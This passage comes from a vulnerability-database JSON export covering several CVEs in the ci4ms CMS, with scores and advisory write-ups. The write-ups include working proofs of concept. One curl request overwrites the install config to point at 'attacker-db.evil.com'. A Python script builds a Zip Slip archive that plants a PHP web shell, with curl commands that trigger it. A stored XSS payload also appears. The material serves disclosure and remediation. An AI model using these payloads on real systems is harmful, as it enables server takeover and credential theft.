"scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T16:09:31Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x3hr-cp7x-44r2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39390", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39390" }, { "reference_url": "https://github.com/advisories/GHSA-x3hr-cp7x-44r2", "reference_id": "GHSA-x3hr-cp7x-44r2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x3hr-cp7x-44r2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1015581?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-cd9w-5f22-xkfk" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/110229?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4%252B0" } ], "aliases": [ "CVE-2026-39390", "GHSA-x3hr-cp7x-44r2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c1ux-y4qk-xfch" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89189?format=api", "vulnerability_id": "VCID-e9xp-rar3-c7bp", "summary": "CI4MS Vulnerable to Post-Installation Re-entry via Cache-Dependent Install Guard Bypass\n## Summary\n\nThe install route guard in ci4ms relies solely on a volatile cache check (`cache('settings')`) combined with `.env` file existence to block post-installation access to the setup wizard. When the database is temporarily unreachable during a cache miss (TTL expiry or admin-triggered cache clear), the guard fails open, allowing an unauthenticated attacker to overwrite the `.env` file with attacker-controlled database credentials, achieving full application takeover.\n\n## Details\n\nThe `InstallFilter::before()` method at `modules/Install/Filters/InstallFilter.php:13` implements the install guard:\n\n```php\npublic function before(RequestInterface $request, $arguments = null)\n{\n if (file_exists(ROOTPATH . '.env') && !empty(cache('settings'))) return show_404();\n}\n```\n\nThis requires **both** conditions — `.env` existence AND non-empty cache — to block access. The cache population happens in `app/Config/Filters.php:128-151` during the Filters constructor, which runs before route-specific filters:\n\n```php\npublic function __construct()\n{\n parent::__construct();\n if (is_file(ROOTPATH . '.env')) {\n try {\n $this->commonModel = new CommonModel();\n if (empty(cache('settings')) && $this->commonModel->db->tableExists('settings')) {\n $this->settings = $this->commonModel->lists('settings');\n // ... populate cache ...\n cache()->save('settings', $set, 86400); // 24h TTL\n }\n } catch (\\Throwable $e) {\n $this->settings = (object)[]; // Silently swallow ALL exceptions\n }\n }\n```\n\nWhen the database is unreachable (connection failure, timeout, maintenance), the `\\Throwable` catch at line 148-150 silently swallows the exception. The cache remains empty, and `InstallFilter::before()` sees `empty(cache('settings'))` as true, allowing the request through.\n\nThe install controller at `modules/Install/Controllers/Install.php:10-87` then processes the POST:\n\n1. The `host` parameter at line 35 is **not present in the validation rules** (`$valData`, lines 13-27) — it is written directly from `$this->request->getPost('host')` to `.env` with zero validation\n2. `copyEnvFile()` (line 70) overwrites the existing `.env` by copying from the `env` template\n3. `updateEnvSettings()` (line 70) writes attacker-controlled values including database hostname\n4. No database connection is needed — the `index()` action only performs filesystem operations\n\nAdditionally, CSRF protection is explicitly disabled for all install routes in `modules/Install/Config/InstallConfig.php:7-10`:\n\n```php\npublic $csrfExcept = [\n 'install',\n 'install/*'\n];\n```\n\nThe cache has a 24-hour TTL (`Filters.php:143`), and `cache()->delete('settings')` is called in 14+ locations across admin controllers (Settings, Blog, Backup, AJAX, Pages), creating recurring windows where the cache is empty and must be repopulated from the database.\n\n## PoC\n\n**Prerequisites:** The target database must be temporarily unreachable (maintenance window, connection exhaustion, network partition) at a moment when the `settings` cache has expired or been cleared.\n\n```bash\n# Step 1: Verify the install route is accessible (DB outage + cache miss)\ncurl -s -o /dev/null -w \"%{http_code}\" http://target/install\n# Expected: 200 (instead of 404)\n\n# Step 2: Overwrite .env with attacker-controlled database credentials\ncurl -X POST http://target/install \\\n -d 'baseUrl=http://target/' \\\n -d 'host=attacker-db.evil.com' \\\n -d 'dbname=ci4ms' \\\n -d 'dbusername=root' \\\n -d 'dbpassword=pass' \\\n -d 'dbdriver=MySQLi' \\\n -d 'dbpre=' \\\n -d 'dbport=3306' \\\n -d 'name=Admin' \\\n -d 'surname=Evil' \\\n -d 'username=admin' \\\n -d 'password=Evil1234!' \\\n -d 'email=evil@attacker.com' \\\n -d 'siteName=Pwned'\n# No CSRF token required (CSRF exempt for install routes)\n# .env is now overwritten with attacker's DB hostname\n\n# Step 3: Follow redirect to /install/dbsetup\n# This runs migrations on the attacker-controlled database and creates an admin account\n# The application now connects to attacker's database = full takeover\n```\n\n## Impact\n\nWhen exploited during a database outage coinciding with cache expiry:\n\n- **Full application takeover**: The `.env` file is overwritten with attacker-controlled database credentials, redirecting all application database queries to an attacker-controlled server\n- **Credential theft**: All subsequent user logins, form submissions, and API calls send data to the attacker's database\n- **Data integrity loss**: The attacker controls what data the application reads from the database, enabling arbitrary content injection, phishing, and privilege escalation\n- **Encryption key reset**: `generateEncryptionKey()` is called (line 70), invalidating all existing encrypted data and sessions\n\nThe attack requires no authentication, no CSRF token, and no user interaction. The exploitability window recurs every 24 hours at cache TTL expiry and after any admin action that clears the settings cache, but is only exploitable when the database is simultaneously unreachable.\n\n## Recommended Fix\n\nReplace the volatile cache-based install guard with a persistent filesystem lock:\n\n```php\n// modules/Install/Filters/InstallFilter.php\nclass InstallFilter implements FilterInterface\n{\n public function before(RequestInterface $request, $arguments = null)\n {\n // Use a persistent filesystem lock instead of volatile cache\n if (file_exists(WRITEPATH . 'installed.lock')) {\n return show_404();\n }\n }\n}\n```\n\nCreate the lock file at the end of successful installation in `Install::dbsetup()`:\n\n```php\n// At the end of dbsetup(), after successful migration and setup:\nfile_put_contents(WRITEPATH . 'installed.lock', date('Y-m-d H:i:s'));\n```\n\nAdditionally, add validation for the `host` parameter in `Install::index()`:\n\n```php\n$valData['host'] = [\n 'label' => lang('Install.databaseHost'),\n 'rules' => 'required|max_length[255]|regex_match[/^[a-zA-Z0-9._-]+$/]'\n];\n```", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39393", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16983", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16863", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16945", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16979", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39393" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-8rh5-4mvx-xj7j", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T20:29:33Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-8rh5-4mvx-xj7j" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39393", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39393" }, { "reference_url": "https://github.com/advisories/GHSA-8rh5-4mvx-xj7j", "reference_id": "GHSA-8rh5-4mvx-xj7j", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8rh5-4mvx-xj7j" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1015581?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-cd9w-5f22-xkfk" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/110229?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4%252B0" } ], "aliases": [ "CVE-2026-39393", "GHSA-8rh5-4mvx-xj7j" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e9xp-rar3-c7bp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89457?format=api", "vulnerability_id": "VCID-g79q-pkjw-2ydw", "summary": "CI4MS: Account Deactivation Module Grants Full Persistent Unauthorized Access for All‑Roles via Improper Session Invalidation (Logic Flaw)\n## Summary\n### Vulnerability: Improper Session Invalidation on Account Deactivation (Broken Access Control / Logic Flaw)\n- This vulnerability is caused by a backend logic flaw that maintains a false trust assumption that already-authenticated users remain trustworthy, even after their accounts are explicitly deactivated. As a result, administrative security actions do not behave as intended, allowing persistent unauthorized access.\n\n### Description\nThe application fails to immediately revoke active user sessions when an account is deactivated. Due to a logic flaw in the backend design, account state changes are enforced only during authentication (login), not for already-established sessions.\n\nThe system implicitly assumes that authenticated users remain trusted for the lifetime of their session. There is no session expiration or account expiration mechanism in place, causing deactivated accounts to retain indefinite access until the user manually logs out. This behavior breaks the intended access control policy and results in persistent unauthorized access, representing a critical security flaw.\n\n### Affected Functionality\n- User session management and authentication logic\n- Account deactivation mechanism\n- All authenticated endpoints, including administrative and content interfaces\n\n### Attack Scenario\n- A user logs into the application.\n- An administrator deactivates the user account.\n- The user remains fully logged in and can continue performing all actions allowed by their role indefinitely, as there is no session expiration.\n- The user can continue invoking backend methods, triggering application actions, accessing sensitive interfaces (including user management if permitted), and interacting with the system as if the account were still active.\n- Access is only lost if the user manually logs out, which may never occur.\n\n### Impact\n- Unauthorized Continued Access: Deactivated users retain full access indefinitely, violating intended access control and expected security behavior.\n- Bypass of Administrative Controls: Administrative actions (deactivation) fail to immediately restrict active sessions.\n- Logic Flaw Resulting in Broken Behavior: Backend authorization logic relies on a flawed trust assumption that authenticated users remain valid, enforcing account state only at login.\n- Full Functional Access Retained: Deactivated users can continue invoking application methods, executing actions, interacting with protected endpoints, and using the system exactly as before being deactivated.\n- Privilege Abuse: Users with elevated roles (moderator, editor, administrator) can continue performing privileged actions after account deactivation, including accessing user management interfaces and modifying application state.\n- Service Disruption Potential: Persistent access allows attackers to disrupt services, manipulate content, or interfere with normal application operations.\n- Attack Persistence: Attackers can maintain access indefinitely, increasing the risk of data exfiltration, unauthorized modifications, or further privilege escalation.\n- False Sense of Remediation: Administrators may believe a threat has been mitigated while the deactivated user remains active within the system.\n\nEndpoint Example: Any endpoint accessible to authenticated users, including dashboards, administrative interfaces, user management pages, and API endpoints.\n\n## Steps To Reproduce (PoC)\n1. Create or use an existing user account.\n2. Log into the application using this account.\n3. From an administrative account, deactivate the logged-in user account.\n4. Observe that the target user remains authenticated.\n5. Verify that the user can still access protected functionality, invoke actions, and interact with the application as before.\n6. Confirm that the user only loses access after manually logging out (if they choose to do so).\n\n## Remediation\n- Immediately invalidate all active sessions when an account is deactivated.\n- Enforce account status checks on every authenticated request, not only during login.\n- Introduce proper session expiration or account expiration mechanisms to prevent indefinite access.\n- Correct the backend logic flaw to ensure access control behavior aligns with intended security design and does not rely on unsafe trust assumptions.\n\n# Ready Video POC:\nhttps://mega.nz/file/zJkhwCII#G1-TecKmNBJmEeBS0ExsAY_RXEmAl3QqMqu4t5oy844", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34572", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10889", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10843", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10879", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12843", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34572" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T13:51:06Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-8fq3-c5w3-pj3q", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T13:51:06Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-8fq3-c5w3-pj3q" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34572", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34572" }, { "reference_url": "https://github.com/advisories/GHSA-8fq3-c5w3-pj3q", "reference_id": "GHSA-8fq3-c5w3-pj3q", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8fq3-c5w3-pj3q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1126144?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34572", "GHSA-8fq3-c5w3-pj3q" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g79q-pkjw-2ydw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89990?format=api", "vulnerability_id": "VCID-j32w-tcpz-1fak", "summary": "CI4MS Backup::restore is vulnerable to Zip Slip leading to RCE\n### Summary\nci4ms Backup::restore extracts user uploaded ZIP archives without validating entry names, allowing an authenticated backend user with the backup create permission to write files to arbitrary filesystem locations (Zip Slip) and achieve remote code execution by dropping a PHP file under the public web root.\n\n### Details\nmodules/Backup/Controllers/Backup.php:80-119 implements the restore action. The uploaded file is moved to `WRITEPATH . 'uploads/'`, and if the extension is `zip`, ZipArchive::extractTo() is called directly without iterating entries to verify they resolve inside the destination:\n\n```php\npublic function restore()\n{\n $valData = ([\n 'backup_file' => ['label' => 'Backup File', 'rules' => 'uploaded[backup_file]|ext_in[backup_file,zip]'],\n ]);\n if ($this->validate($valData) == false) return redirect()->route('backup')->withInput()->with('errors', $this->validator->getErrors());\n $file = $this->request->getFile('backup_file');\n\n if ($file && $file->isValid() && ! $file->hasMoved()) {\n $newName = $file->getRandomName();\n $uploadPath = WRITEPATH . 'uploads/';\n ...\n $filePath = WRITEPATH . 'uploads/' . $newName;\n $sqlPath = $filePath;\n if ($ext === 'zip') {\n $zip = new \\ZipArchive();\n if ($zip->open($filePath) === true) {\n $zip->extractTo($uploadPath); // no entry-name validation\n $sqlPath = $uploadPath . $zip->getNameIndex(0);\n $zip->close();\n @unlink($filePath);\n }\n }\n ...\n }\n}\n```\n\nA ZIP containing entries like `../../public/shell.php` is extracted outside `writable/uploads/` into directories served by PHP. The author validates entries correctly in modules/Methods/Controllers/Methods.php:165-175 with a realpath + regex loop; the same check is missing here.\n\nRouting: modules/Backup/Config/Routes.php binds `POST backend/backup/restore` to Backup::restore with `role=create`, and modules/Backup/Config/BackupConfig.php adds `backend/backup` and `backend/backup/*` to `csrfExcept`, so the route accepts cross-site POSTs from an authenticated administrator's browser.\n\n### PoC\nBuild the archive:\n\n```python\npython3 -c \"\nimport zipfile\nwith zipfile.ZipFile('evil.zip','w') as z:\n z.writestr('../../public/shell.php', '<?php system(\\$_GET[\\\"c\\\"]); ?>')\n z.writestr('dump.sql', 'SELECT 1;')\n\"\n```\n\nSubmit it as a backup to restore:\n\n```bash\ncurl -i -b 'ci4ms_session=<SESSION_ID>' \\\n -F 'backup_file=@evil.zip' \\\n https://target.example.com/backend/backup/restore\n```\n\nTrigger the shell:\n\n```bash\ncurl 'https://target.example.com/shell.php?c=id'\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n### Impact\nAny ci4ms account that can restore a backup can write arbitrary files under the application root and gain remote code execution on the server, fully compromising the installation, the database credentials stored in .env, and any content the site handles. Because the route is in the csrfExcept list, a logged-in administrator who visits a malicious page can be forced to perform the restore cross-site, turning this into drive-by RCE against site operators.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41202", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00464", "scoring_system": "epss", "scoring_elements": "0.64694", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00464", "scoring_system": "epss", "scoring_elements": "0.64693", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00464", "scoring_system": "epss", "scoring_elements": "0.64703", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00534", "scoring_system": "epss", "scoring_elements": "0.67775", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41202" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-07T12:39:58Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xp9f-pvvc-57p4", "reference_id": "", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-07T12:39:58Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xp9f-pvvc-57p4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41202", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41202" }, { "reference_url": "https://github.com/advisories/GHSA-xp9f-pvvc-57p4", "reference_id": "GHSA-xp9f-pvvc-57p4", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xp9f-pvvc-57p4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1126288?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1041566?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-cd9w-5f22-xkfk" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-qrag-mndk-xbb7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/110106?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5%252B0" } ], "aliases": [ "CVE-2026-41202", "GHSA-xp9f-pvvc-57p4" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j32w-tcpz-1fak" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89838?format=api", "vulnerability_id": "VCID-j76j-w4bk-nuft", "summary": "CI4MS: Pages Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via Page Management Fields (Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsanitized Page Creation and Editing Inputs\n\n### Description\nThe application fails to properly sanitize user-controlled input within the **Page Management** functionality when creating or editing pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side.\n\nThese stored values are later rendered without proper output encoding across administrative page lists and public-facing page views, leading to stored DOM-based cross-site scripting (XSS).\n\n### Affected Functionality\n- Page creation functionality\n- Page editing functionality\n- Page list and management views\n- Public-facing page rendering\n- Storage and retrieval of page-related data\n\n### Affected Fields\n- Title\n- URL\n- Content\n- Cover Image\n- Image URL\n- Image Width\n- Image Height\n- SEO Description\n- SEO Keywords\n\n### Attack Scenario\n- An attacker creates or edits a page and injects a malicious XSS payload into one or more page-related input fields.\n- The application stores these values without sanitization or encoding.\n- The payload is rendered in administrative page lists and public-facing page views.\n- The payload executes automatically in the browser context of administrators, authenticated users, and unauthenticated visitors.\n\n### Impact\n- Persistent Stored XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators or privileged users\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire application\n\nEndpoints:\n- `/backend/pages/create`\n- Page list management view\n- Public-facing page views\n\n## Steps To Reproduce (POC)\n1. Navigate to the Page Management -> Add Page interface\n2. Insert an XSS payload into any page-related field such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save or publish the page\n4. View the page via the administrative page list or public-facing page\n5. Observe the XSS payload executing automatically\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation 